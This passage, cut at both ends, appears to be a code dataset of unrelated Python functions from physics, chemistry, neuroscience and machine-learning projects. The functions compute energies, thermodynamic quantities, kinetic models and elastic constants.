update\r\n DSYR(LLT,Kmn[:,i].copy(),Delta_tau) #LLT = LLT + np.outer(Kmn[:,i],Kmn[:,i])*Delta_tau\r\n L = jitchol(LLT)\r\n #cholUpdate(L,Kmn[:,i]*np.sqrt(Delta_tau))\r\n V,info = dtrtrs(L,Kmn,lower=1)\r\n Sigma_diag = np.sum(V*V,-2)\r\n si = np.sum(V.T*V[:,i],-1)\r\n mu += (Delta_v-Delta_tau*mu[i])*si\r\n self.iterations += 1\r\n #Sigma recomputation with Cholesky decompositon\r\n LLT = LLT0 + np.dot(Kmn*self.tau_tilde[None,:],Kmn.T)\r\n L = jitchol(LLT)\r\n V,info = dtrtrs(L,Kmn,lower=1)\r\n V2,info = dtrtrs(L.T,V,lower=0)\r\n Sigma_diag = np.sum(V*V,-2)\r\n Knmv_tilde = np.dot(Kmn,self.v_tilde)\r\n mu = np.dot(V2.T,Knmv_tilde)\r\n epsilon_np1 = sum((self.tau_tilde-np1[-1])**2)/self.num_data\r\n epsilon_np2 = sum((self.v_tilde-np2[-1])**2)/self.num_data\r\n np1.append(self.tau_tilde.copy())\r\n np2.append(self.v_tilde.copy())\r\n\r\n self._compute_GP_variables()", "def calculate_E0(self) -> float:\n noisy = self.kernel_eigenvectors_[-1].copy()\n np.random.shuffle(noisy)\n\n kernel_eigenvectors = self.kernel_eigenvectors_[:-1]\n kernel_eigenvectors.append(noisy)\n\n eigenvectors_matrix = scipy.sparse.csr_matrix(\n np.column_stack([eigenvector for eigenvector in kernel_eigenvectors])\n )\n\n if len(kernel_eigenvectors) == 2:\n ev0 = kernel_eigenvectors[0]\n ev1 = kernel_eigenvectors[1]\n _, Gamma, _ = scipy.sparse.linalg.svds(\n ev0.T @ ev1, k=self.n_jointly_smooth_functions, which=\"LM\"\n )\n else:\n _, Gamma, _ = scipy.sparse.linalg.svds(\n eigenvectors_matrix, k=self.n_jointly_smooth_functions, which=\"LM\"\n )\n\n Gamma.sort()\n gamma2 = Gamma[-2]\n E0 = (1 + gamma2) / 2\n return E0", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib += 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def make_energy(self):\n def energy_func(m):\n heff = self.field(m)\n return -energy.zeeman(m, self.Ms, heff) \\\n + energy.shape_anisotropy(m, self.Ms,\n self.Nd[0], self.Nd[1], self.Nd[2])\n self.energy = energy_func", "def additional_equations(self, k):\n ######################################################################\n # equation for saturated gas at hot side outlet\n o1 = self.outl[0].to_flow()\n self.residual[k] = o1[2] - h_mix_pQ(o1, 1)", "def 
get_effective_mass():\n\n H_BAR = 6.582119514e-16 # eV*s\n M_0 = 9.10938356e-31 # kg\n N_KPTS = 6 # Number of k-points included in the parabola.\n\n spin_up = Spin(1)\n\n band_structure = Vasprun('vasprun.xml').get_band_structure()\n\n # Locations of CBM and VBM in band_structure.bands\n cbm_band_index = band_structure.get_cbm()['band_index'][spin_up][0]\n cbm_kpoint_index = band_structure.get_cbm()['kpoint_index'][0]\n\n vbm_band_index = band_structure.get_vbm()['band_index'][spin_up][0]\n vbm_kpoint_index = band_structure.get_vbm()['kpoint_index'][0]\n\n k = {'electron': {'left': [], 'right': []},\n 'hole': {'left': [], 'right': []}}\n E = {'electron': {'left': [], 'right': []},\n 'hole': {'left': [], 'right': []}}\n\n e_ref_coords = band_structure.kpoints[cbm_kpoint_index]._ccoords\n h_ref_coords = band_structure.kpoints[vbm_kpoint_index]._ccoords\n\n for n in range(-N_KPTS, 1):\n e_coords = band_structure.kpoints[cbm_kpoint_index + n]._ccoords\n h_coords = band_structure.kpoints[vbm_kpoint_index + n]._ccoords\n\n k['electron']['left'].append(\n ((e_coords[0] - e_ref_coords[0])**2 +\n (e_coords[1] - e_ref_coords[1])**2 +\n (e_coords[2] - e_ref_coords[2])**2)**0.5\n )\n k['hole']['left'].append(\n ((h_coords[0] - h_ref_coords[0])**2 +\n (h_coords[1] - h_ref_coords[1])**2 +\n (h_coords[2] - h_ref_coords[2])**2)**0.5\n )\n\n e_energy = band_structure.bands[\n spin_up][cbm_band_index][cbm_kpoint_index + n]\n h_energy = band_structure.bands[\n spin_up][vbm_band_index][vbm_kpoint_index + n]\n\n E['electron']['left'].append(e_energy)\n E['hole']['left'].append(h_energy)\n\n for n in range(1, 1 + N_KPTS):\n e_coords = band_structure.kpoints[cbm_kpoint_index + n]._ccoords\n h_coords = band_structure.kpoints[vbm_kpoint_index + n]._ccoords\n\n k['electron']['right'].append(\n ((e_coords[0] - e_ref_coords[0])**2 +\n (e_coords[1] - e_ref_coords[1])**2 +\n (e_coords[2] - e_ref_coords[2])**2)**0.5\n )\n k['hole']['right'].append(\n ((h_coords[0] - h_ref_coords[0])**2 +\n (h_coords[1] - h_ref_coords[1])**2 +\n (h_coords[2] - h_ref_coords[2])**2)**0.5\n )\n\n e_energy = band_structure.bands[\n spin_up][cbm_band_index][cbm_kpoint_index + n]\n h_energy = band_structure.bands[\n spin_up][vbm_band_index][vbm_kpoint_index + n]\n\n E['electron']['right'].append(e_energy)\n E['hole']['right'].append(h_energy)\n\n # 2nd order fits\n e_l_fit = np.poly1d(\n np.polyfit(k['electron']['left'], E['electron']['left'], 2))\n e_r_fit = np.poly1d(\n np.polyfit(k['electron']['right'], E['electron']['right'], 2))\n h_l_fit = np.poly1d(\n np.polyfit(k['hole']['left'], E['hole']['left'], 2))\n h_r_fit = np.poly1d(\n np.polyfit(k['hole']['right'], E['hole']['right'], 2))\n\n # Curvatures\n e_l_curvature = e_l_fit.deriv().deriv()[0]\n e_r_curvature = e_r_fit.deriv().deriv()[0]\n h_l_curvature = h_l_fit.deriv().deriv()[0]\n h_r_curvature = h_r_fit.deriv().deriv()[0]\n\n # Unit conversion\n e_m_eff_l = 10 * ((H_BAR ** 2) / e_l_curvature) / M_0\n e_m_eff_r = 10 * ((H_BAR ** 2) / e_r_curvature) / M_0\n h_m_eff_l = -10 * ((H_BAR ** 2) / h_l_curvature) / M_0\n h_m_eff_r = -10 * ((H_BAR ** 2) / h_r_curvature) / M_0\n\n return {'electron': {'left': e_m_eff_l, 'right': e_m_eff_r},\n 'hole': {'left': h_m_eff_l, 'right': h_m_eff_r}}", "def az_kinetic_model(nt, tf, ka_rates, kb_rates, normed=True, X0=None):\n def dx(x, t, A, B):\n return np.dot(A, x) + B\n \n if type(nt) == list:\n nt = transform(nt)\n \n A = network_matrix(nt, ka_rates)\n B = np.dot(network_matrix(nt, kb_rates), np.ones(A.shape[0]))\n if X0 == None:\n X0 = 
np.zeros(A.shape[0])\n \n X = odeint(lambda x, t: dx(x, t, A, B), X0, np.linspace(0, tf, 1000))\n if normed:\n return az.norm_array(X[-1])\n else:\n return X[-1]", "def energy(self, state):\n return _modeller.mod_state_optimizer_energy(self._modpt,\n self.__edat.modpt,\n state, self.__libs.modpt)", "def __init__(self, temperature=298.0 * simtk.unit.kelvin, collision_rate=91.0 / simtk.unit.picoseconds, timestep=1.0 * simtk.unit.femtoseconds):\n\n # Initialize constants.\n kT = kB * temperature\n gamma = collision_rate\n\n # Create a new custom integrator.\n super(GHMCIntegrator, self).__init__(timestep)\n\n #\n # Integrator initialization.\n #\n self.addGlobalVariable(\"kT\", kT) # thermal energy\n self.addGlobalVariable(\"b\", numpy.exp(-gamma * timestep)) # velocity mixing parameter\n self.addPerDofVariable(\"sigma\", 0)\n self.addGlobalVariable(\"ke\", 0) # kinetic energy\n self.addPerDofVariable(\"vold\", 0) # old velocities\n self.addPerDofVariable(\"xold\", 0) # old positions\n self.addGlobalVariable(\"Eold\", 0) # old energy\n self.addGlobalVariable(\"Enew\", 0) # new energy\n self.addGlobalVariable(\"accept\", 0) # accept or reject\n self.addGlobalVariable(\"naccept\", 0) # number accepted\n self.addGlobalVariable(\"ntrials\", 0) # number of Metropolization trials\n self.addPerDofVariable(\"x1\", 0) # position before application of constraints\n\n #\n # Pre-computation.\n # This only needs to be done once, but it needs to be done for each degree of freedom.\n # Could move this to initialization?\n #\n self.addComputePerDof(\"sigma\", \"sqrt(kT/m)\")\n\n #\n # Allow context updating here.\n #\n self.addUpdateContextState()\n\n #\n # Constrain positions.\n #\n self.addConstrainPositions()\n\n #\n # Velocity perturbation.\n #\n self.addComputePerDof(\"v\", \"sqrt(b)*v + sqrt(1-b)*sigma*gaussian\")\n self.addConstrainVelocities()\n\n #\n # Metropolized symplectic step.\n #\n self.addComputeSum(\"ke\", \"0.5*m*v*v\")\n self.addComputeGlobal(\"Eold\", \"ke + energy\")\n self.addComputePerDof(\"xold\", \"x\")\n self.addComputePerDof(\"vold\", \"v\")\n self.addComputePerDof(\"v\", \"v + 0.5*dt*f/m\")\n self.addComputePerDof(\"x\", \"x + v*dt\")\n self.addComputePerDof(\"x1\", \"x\")\n self.addConstrainPositions()\n self.addComputePerDof(\"v\", \"v + 0.5*dt*f/m + (x-x1)/dt\")\n self.addConstrainVelocities()\n self.addComputeSum(\"ke\", \"0.5*m*v*v\")\n self.addComputeGlobal(\"Enew\", \"ke + energy\")\n self.addComputeGlobal(\"accept\", \"step(exp(-(Enew-Eold)/kT) - uniform)\")\n self.addComputePerDof(\"x\", \"x*accept + xold*(1-accept)\")\n self.addComputePerDof(\"v\", \"v*accept - vold*(1-accept)\")\n\n #\n # Velocity randomization\n #\n self.addComputePerDof(\"v\", \"sqrt(b)*v + sqrt(1-b)*sigma*gaussian\")\n self.addConstrainVelocities()\n\n #\n # Accumulate statistics.\n #\n self.addComputeGlobal(\"naccept\", \"naccept + accept\")\n self.addComputeGlobal(\"ntrials\", \"ntrials + 1\")", "def _calc_Em(self):\n return (self.parameters.E0 +\n self.x * sqrt2 * self.parameters.sigma * self.mt)", "def calc_ked_WFI(self):\n\n #Initialize kinetic energy density\n self.ked_WFI = np.zeros( (self.grid.Nelem, 1))\n\n #Figure out the number of occupied orbitals\n if self.m == 0:\n if self.pol == 1:\n Nocc = np.floor(self.N/2)\n nu = self.N / 2 - Nocc\n else:\n Nocc = np.floor(self.N)\n nu = self.N - Nocc\n\n else:\n #m>0 orbitals hold twice as many electrons due to +-m symmetry\n if self.pol == 1:\n Nocc = np.floor(self.N / 4)\n nu = self.N / 4 - Nocc\n else:\n Nocc = np.floor(self.N/2)\n nu = self.N / 
2 - Nocc\n\n #Construct density\n for i in range(int(Nocc)):\n # print(\"phi from pssolver\", self.phi)\n # print(\"phi subset\", self.phi[:,i])\n # print(\"integrate returns\", self.grid.integrate( self.phi[:,i]**2 )**0.5)\n\n #Normalized orbital\n phi_norm = self.phi[:,i] / self.grid.integrate( self.phi[:,i]**2 )**0.5\n phi_norm = phi_norm[:, None]\n self.ked_WFI += (phi_norm * (self.H0 @ phi_norm)) / self.grid.w[:, None]\n\n #If we are doing fractional robitals and are non-integer\n if self.FRACTIONAL is True and nu != 0:\n #Normalized orbital\n phi_norm = self.phi[:,i] / self.grid.integrate( self.phi[:, Nocc+1]**2)**0.5\n phi_norm = phi_norm[:, None]\n self.ked_WFI += nu * ( phi_norm * (self.H0 @ phi_norm) ) / self.grid.w[:, None]\n\n #Scale densities appropriately\n if self.m == 0:\n if self.pol == 1: #Unpolarized electrons\n self.ked_WFI = 2 * self.ked_WFI\n\n else: # m>0 orbitals hold twice as many electrons due to +-m symmetry\n if self.pol == 1:\n self.ked_WFI = 4 * self.ked_WFI\n else:\n self.ked_WFI = 2 * self.ked_WFI", "def DyEvo(x, t, T0, r1, r2, K_co, K_ch, alpha, n):\n y=np.zeros([np.size(x)])\n D=np.zeros([2]) \n #define fitnss\n D[0]=dmax*x[0]**n/(K_co**n+x[0]**n) #cooperator\n D[1]=dmax*x[0]**n/(K_ch**n+x[0]**n) #cheater \n #degradation\n deg=fmax*x[1]/(x[1]+Kd) \n #ODE of eco-evo dynamics\n y[0]=alpha*T0-deg*x[0]-alpha*x[0] #dt/dt\n y[1]=x[1]*(r1*(1-x[1]-x[2])-D[0]-alpha)#d Co/dt\n y[2]=x[2]*(r2*(1-x[1]-x[2])-D[1]-alpha) #d Ch/dt\n \n return y", "def spikingModel(wEE, wEI, wIE, wII, stim_e, stim_i,\n time=1000, dt=0.1, Vth=1.0, Vre=0.0,\n tau_e=15.0, tau_i=10.0, ref_e=5.0, ref_i=5.0, \n syntau2_e=3.0, syntau2_i=2.0, syntau1=1.0):\n\n T = np.arange(0,time,dt)\n nE = wEE.shape[0]\n nI = wII.shape[0]\n\n Ve = np.zeros((nE,len(T)))\n Vi = np.zeros((nI,len(T)))\n # Set initial conditions\n Ve = np.random.uniform(0,1,size=(nE,))\n Vi = np.random.uniform(0,1,size=(nI,))\n # Instantiate synaptic currents empty matrix\n Ie = np.zeros((nE,len(T)))\n Ii = np.zeros((nI,len(T)))\n # Instantiate spiking matrix\n spkE = np.zeros((nE,time))\n spkI = np.zeros((nI,time))\n # Instantiate synaptic input matrix (temporally downsampled)\n synE = np.zeros((nE,time))\n synI = np.zeros((nI,time))\n\n bin_spkE = np.zeros((nE,))\n bin_spkI = np.zeros((nI,))\n # Synaptic rise gating variable\n xrse_ee = np.zeros((nE,))\n xdec_ee = np.zeros((nE,))\n xrse_ei= np.zeros((nI,))\n xdec_ei = np.zeros((nI,))\n xrse_ie = np.zeros((nE,))\n xdec_ie = np.zeros((nE,))\n xrse_ii= np.zeros((nI,))\n xdec_ii = np.zeros((nI,))\n\n\n # Set random biases from a uniform distribution\n # Excitatory neurons\n mu_e = np.random.uniform(1.1,1.2,size=(nE,))\n #mu_e = np.random.uniform(1.05,1.15,size=(nE,)) # Imbalanced state\n # Inhibitory neurons\n mu_i = np.random.uniform(1.0,1.05,size=(nI,))\n\n maxrate = 500 # max rate is 100hz\n maxtimes = int(np.round(maxrate*time/1000))\n timesE = np.zeros((nE,maxrate))\n timesI = np.zeros((nI,maxrate))\n ne_s = np.zeros((nE,),dtype=int)\n ni_s = np.zeros((nI,),dtype=int)\n\n refractory_e = np.zeros((nE,))\n refractory_i = np.zeros((nI,))\n for t in range(len(T)-1):\n ## Using RK2 method\n\n ## K1s\n Ve = Ve + dt*((mu_e + stim_e - Ve)/tau_e + Ie[:,t])\n Vi = Vi + dt*((mu_i + stim_i - Vi)/tau_i + Ii[:,t])\n\n # Synaptic gating\n # Excitatory synapses\n xrse_ee = xrse_ee - dt*xrse_ee/syntau1 + np.matmul(bin_spkE,wEE)\n xdec_ee = xdec_ee - dt*xdec_ee/syntau2_e + np.matmul(bin_spkE,wEE)\n xrse_ei = xrse_ei - dt*xrse_ei/syntau1 + np.matmul(bin_spkE,wEI)\n xdec_ei = xdec_ei - 
dt*xdec_ei/syntau2_e + np.matmul(bin_spkE,wEI)\n # Inhibitory dt*synapses\n xrse_ie = xrse_ie - dt*xrse_ie/syntau1 + np.matmul(bin_spkI,wIE)\n xdec_ie = xdec_ie - dt*xdec_ie/syntau2_i + np.matmul(bin_spkI,wIE)\n xrse_ii = xrse_ii - dt*xrse_ii/syntau1 + np.matmul(bin_spkI,wII)\n xdec_ii = xdec_ii - dt*xdec_ii/syntau2_i + np.matmul(bin_spkI,wII)\n\n # Calculate synaptic outputs given rise and decay times\n Ie[:,t+1] = (xdec_ee - xrse_ee)/(syntau2_e - syntau1) + (xdec_ie - xrse_ie)/(syntau2_i - syntau1)\n Ii[:,t+1] = (xdec_ii - xrse_ii)/(syntau2_i - syntau1) + (xdec_ei - xrse_ei)/(syntau2_e - syntau1)\n\n ## Spiking\n # Find which neurons exceed threshold (and are not in a refractory period)\n bin_spkE = np.multiply(Ve>Vth, refractory_e==0.0)\n bin_spkI = np.multiply(Vi>Vth, refractory_i==0.0)\n\n # Save spike time (and downsample to 1ms)\n tms = int(np.floor(T[t]))\n spkE[bin_spkE,tms] = 1 # spikes are okay - refractory period is 5ms, anyway\n spkI[bin_spkI,tms] = 1\n synE[:,tms] = synE[:,tms] + Ie[:,t]\n synI[:,tms] = synI[:,tms] + Ii[:,t]\n\n # Reset voltages\n Ve[bin_spkE] = Vre\n Vi[bin_spkI] = Vre\n\n # spike times\n timesE[bin_spkE,ne_s[bin_spkE]] = T[t+1]\n timesI[bin_spkI,ni_s[bin_spkI]] = T[t+1]\n ne_s[bin_spkE] = ne_s[bin_spkE] + 1\n ni_s[bin_spkI] = ni_s[bin_spkI] + 1\n\n\n # Set refractory period\n # Add a refractory time step to neurons who just spiked, and to those are still in a refractory period\n refractory_e = refractory_e + (bin_spkE * dt) + (refractory_e!=0) * dt \n refractory_i = refractory_i + (bin_spkI * dt) + (refractory_i!=0) * dt\n # Once refractory period is complete, allow to spike\n can_spike_again_e = np.round(refractory_e,1) == ref_e\n can_spike_again_i = np.round(refractory_i,1) == ref_i\n\n refractory_e[can_spike_again_e] = 0.0\n refractory_i[can_spike_again_i] = 0.0\n\n # Set neurons who are in their refractory to the baseline membrane potential\n in_refractory_e = refractory_e != 0.0\n in_refractory_i = refractory_i != 0.0\n\n Ve[in_refractory_e] = Vre\n Vi[in_refractory_i] = Vre\n \n return spkE, spkI, synE, synI, timesE, timesI, ne_s, ni_s", "def band_energy(k,t=1.0,e0=0.2,a=1.0):\n return e0-t*np.exp(1j*k*a)-t*np.exp(-1j*k*a)", "def energy(data):\n\n return np.real(np.mean(np.abs(data)**2, axis=1))", "def conductivity(self, T):\n m = self.mass\n mu = self.viscosity(T)\n K = (15/4) * kB * mu / m\n return K", "def measure_kinetic_energy(self, t_measure=None):\n assert self.data is not None\n time = self.get_time()\n N = self.get_N()\n m0 = self.sim_chain.m0\n #print 'm0', m0\n \n if t_measure is not None:\n # find index for time closest to t_measure\n idx = self._find_index_for_time(t_measure)\n \n # calculate kinetic energy\n velocities = self.data[idx,N:2*N]\n masses = self.sim_chain.m\n kinetic_energy = 0.5*np.sum( np.multiply(masses/m0, velocities**2.0) )\n return kinetic_energy\n else:\n kinetic_energies = np.zeros(len(time))\n ctr = 0\n for tau in time:\n kinetic_energies[ctr] = self.measure_kinetic_energy(tau)\n ctr += 1\n return kinetic_energies", "def get_energy(self, circuit, sampler):\n val = 0.0\n for meas in self.hamiltonian:\n c = circuit.copy()\n for op in meas.ops:\n if op.op == \"X\":\n c.h[op.n]\n elif op.op == \"Y\":\n c.rx(-np.pi / 2)[op.n]\n measured = sampler(c, meas.n_iter())\n for bits, prob in measured.items():\n if sum(bits) % 2:\n val -= prob * meas.coeff\n else:\n val += prob * meas.coeff\n return val.real", "def energy(self, visible):\n bias_term = tf.matmul(visible, self._bias_visible)\n linear_transform = tf.matmul(visible, 
self._weights) + tf.squeeze(self._bias_hidden)\n hidden_term = tf.reduce_sum(tf.math.log(1 + tf.exp(linear_transform)), axis=1)\n return tf.reduce_mean(-hidden_term - bias_term)", "def energy(p,m):\n return math.sqrt(p*p + m*m)", "def energy_yield(self):\n return self['kwh_per_kw']", "def make_energy(self):\n @nb.njit\n def energy_func(m):\n heff = self.field(m)\n return -energy.zeeman(m, self.Ms, heff) \\\n + energy.shape_anisotropy(m, self.Ms, self.Nd[0], self.Nd[1], self.Nd[2]) \\\n + energy.uniaxial_anisotropy(m, self.u, self.Ku1, self.Ku2) \\\n + energy.cubic_anisotropy(m, self.c1, self.c2, self.c3,\n self.Kc1, self.Kc2, self.Kc3)\n self.energy = energy_func", "def Fermi(En,T):\n ev = 1.60218e-19\n kb = 1.380e-23\n return 1/(1+np.exp(En/(kb*T/ev)))", "def energy(self, r):\n sigma = self.params['sigma']\n epsilon = self.params['epsilon']\n s = sigma / r\n s6 = s**6; s12 = s6 * s6\n pot = 4.0 * epsilon * (s12 - s6)\n return pot", "def set_ec(self, etacalc):\n if not self.__thermodyn:\n C = np.zeros((6,6))\n \n LC = self.__structures.items()[0][1].LC\n if self.__mthd == 'Energy':\n if type(etacalc)==list:\n A2=[]\n for i in range(len(etacalc)):\n A2.append(self.__A2[i][etacalc[i]])\n else:\n if not etacalc in self.__A2[0].keys(): raise ValueError('Please coose one of %s'%(self.__A2[0].keys()))\n A2 = [a2[etacalc] for a2 in self.__A2]\n \n \n #%%%--- Cubic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'CI' or \\\n LC == 'CII'):\n C[0,0] =-2.*(A2[0]-3.*A2[1])/3.\n C[1,1] = C[0,0]\n C[2,2] = C[0,0]\n C[3,3] = A2[2]/6.\n C[4,4] = C[3,3]\n C[5,5] = C[3,3]\n C[0,1] = (2.*A2[0]-3.*A2[1])/3.\n C[0,2] = C[0,1]\n C[1,2] = C[0,1]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Hexagonal structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'HI' or \\\n LC == 'HII'):\n C[0,0] = 2.*A2[3]\n C[0,1] = 2./3.*A2[0] + 4./3.*A2[1] - 2.*A2[2] - 2.*A2[3]\n C[0,2] = 1./6.*A2[0] - 2./3.*A2[1] + 0.5*A2[2]\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[2,2] = 2.*A2[2]\n C[3,3] =-0.5*A2[2] + 0.5*A2[4]\n C[4,4] = C[3,3]\n C[5,5] = .5*(C[0,0] - C[0,1])\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Rhombohedral I structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'RI'):\n C[0,0] = 2.*A2[3]\n C[0,1] = A2[1]- 2.*A2[3]\n C[0,2] = .5*( A2[0] - A2[1] - A2[2])\n C[0,3] = .5*(-A2[3] - A2[4] + A2[5])\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[1,3] =-C[0,3]\n C[2,2] = 2.*A2[2]\n C[3,3] = .5*A2[4]\n C[4,4] = C[3,3]\n C[4,5] = C[0,3]\n C[5,5] = .5*(C[0,0] - C[0,1])\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Rhombohedral II structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'RII'):\n C[0,0] = 2.*A2[3]\n C[0,1] = A2[1]- 2.*A2[3]\n C[0,2] = .5*( A2[0] - A2[1] - A2[2])\n C[0,3] = .5*(-A2[3] - A2[4] + A2[5])\n C[0,4] = .5*(-A2[3] - A2[4] + A2[6])\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[1,3] =-C[0,3]\n C[1,4] =-C[0,4] \n C[2,2] = 2.*A2[2]\n C[3,3] = .5*A2[4]\n C[3,5] =-C[0,4]\n C[4,4] = C[3,3]\n C[4,5] = C[0,3]\n C[5,5] = .5*(C[0,0] - C[0,1])\n 
#--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Tetragonal I structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'TI'):\n C[0,0] = (A2[0]+2.*A2[1])/3.+.5*A2[2]-A2[3]\n C[0,1] = (A2[0]+2.*A2[1])/3.-.5*A2[2]-A2[3]\n C[0,2] = A2[0]/6.-2.*A2[1]/3.+.5*A2[3]\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[2,2] = 2.*A2[3]\n C[3,3] = .5*A2[4]\n C[4,4] = C[3,3]\n C[5,5] = .5*A2[5]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Tetragonal II structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'TII'):\n C[0,0] = (A2[0]+2.*A2[1])/3.+.5*A2[2]-A2[4]\n C[1,1] = C[0,0]\n C[0,1] = (A2[0]+2.*A2[1])/3.-.5*A2[2]-A2[4]\n C[0,2] = A2[0]/6.-(2./3.)*A2[1]+.5*A2[4]\n C[0,5] = (-A2[2]+A2[3]-A2[6])/4.\n C[1,2] = C[0,2]\n C[1,5] =-C[0,5]\n C[2,2] = 2.*A2[4]\n C[3,3] = .5*A2[5]\n C[4,4] = C[3,3]\n C[5,5] = .5*A2[6]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Orthorhombic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'O'):\n C[0,0] = 2.*A2[0]/3.+4.*A2[1]/3.+A2[3]-2.*A2[4]-2.*A2[5]\n C[0,1] = 1.*A2[0]/3.+2.*A2[1]/3.-.5*A2[3]-A2[5]\n C[0,2] = 1.*A2[0]/3.-2.*A2[1]/3.+4.*A2[2]/3.-.5*A2[3]-A2[4]\n C[1,1] = 2.*A2[4]\n C[1,2] =-2.*A2[1]/3.-4.*A2[2]/3.+.5*A2[3]+A2[4]+A2[5]\n C[2,2] = 2.*A2[5]\n C[3,3] = .5*A2[6]\n C[4,4] = .5*A2[7]\n C[5,5] = .5*A2[8]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Monoclinic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'M'):\n C[0,0] = 2.*A2[0]/3.+8.*(A2[1]+A2[2])/3.-2.*(A2[5]+A2[8]+A2[9])\n C[0,1] = A2[0]/3.+4.*(A2[1]+A2[2])/3.-2.*A2[5]-A2[9]\n C[0,2] =(A2[0]-4.*A2[2])/3.+A2[5]-A2[8]\n C[0,5] =-1.*A2[0]/6.-2.*(A2[1]+A2[2])/3.+.5*(A2[5]+A2[7]+A2[8]+A2[9]-A2[12])\n C[1,1] = 2.*A2[8]\n C[1,2] =-4.*(2.*A2[1]+A2[2])/3.+2.*A2[5]+A2[8]+A2[9]+A2[12]\n C[1,5] =-1.*A2[0]/6.-2.*(A2[1]+A2[2])/3.-.5*A2[3]+A2[5]+.5*(A2[7]+A2[8]+A2[9])\n C[2,2] = 2.*A2[9]\n C[2,5] =-1.*A2[0]/6.+2.*A2[1]/3.-.5*(A2[3]+A2[4]-A2[7]-A2[8]-A2[9]-A2[12])\n C[3,3] = .5*A2[10]\n C[3,4] = .25*(A2[6]-A2[10]-A2[11])\n C[4,4] = .5*A2[11]\n C[5,5] = .5*A2[12]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Triclinic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'N'):\n C[0,0] = 2.*A2[0]\n C[0,1] = 1.*(-A2[0]-A2[1]+A2[6])\n C[0,2] = 1.*(-A2[0]-A2[2]+A2[7])\n C[0,3] = .5*(-A2[0]-A2[3]+A2[8]) \n C[0,4] = .5*(-A2[0]+A2[9]-A2[4])\n C[0,5] = .5*(-A2[0]+A2[10]-A2[5])\n C[1,1] = 2.*A2[1]\n C[1,2] = 1.*(A2[11]-A2[1]-A2[2])\n C[1,3] = .5*(A2[12]-A2[1]-A2[3])\n C[1,4] = .5*(A2[13]-A2[1]-A2[4])\n C[1,5] = 